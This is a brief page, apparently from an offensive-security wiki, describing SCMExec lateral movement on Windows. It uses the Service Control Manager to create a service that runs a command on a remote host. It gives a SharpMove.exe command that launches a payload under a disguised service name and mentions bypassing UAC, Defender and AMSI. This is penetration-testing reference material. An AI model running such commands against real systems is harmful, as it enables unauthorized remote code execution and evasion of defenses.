Carlos Polop 72f20a3fa2 impr
2025-04-07 02:44:44 +02:00

605 B

DCOM Exec

{{#include ../../banners/hacktricks-training.md}}

SCM

SCMExec is a technique to execute commands on remote systems using the Service Control Manager (SCM) to create a service that runs the command. This method can bypass some security controls, such as User Account Control (UAC) and Windows Defender.

Tools

SharpMove.exe action=scm computername=remote.host.local command="C:\windows\temp\payload.exe" servicename=WindowsDebug amsi=true

{{#include ../../banners/hacktricks-training.md}}